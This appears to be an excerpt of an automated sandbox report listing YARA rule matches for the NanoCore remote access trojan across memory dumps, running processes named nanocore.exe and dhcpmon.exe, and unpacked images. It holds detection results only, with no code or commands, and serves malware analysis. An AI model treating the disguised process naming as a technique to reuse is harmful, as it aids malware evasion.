      Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.703677926.0000000002440000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.909667904.0000000005820000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.5820000.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.33531ec.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.33531ec.6.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.58b4629.13.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.58b0000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.233ba50.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.35b7815.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.3477815.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.3547815.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.3357815.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.245ba50.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.35b31ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.34731ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.35431ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.252b8c4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.35b31ec.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.35431ec.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.58b0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
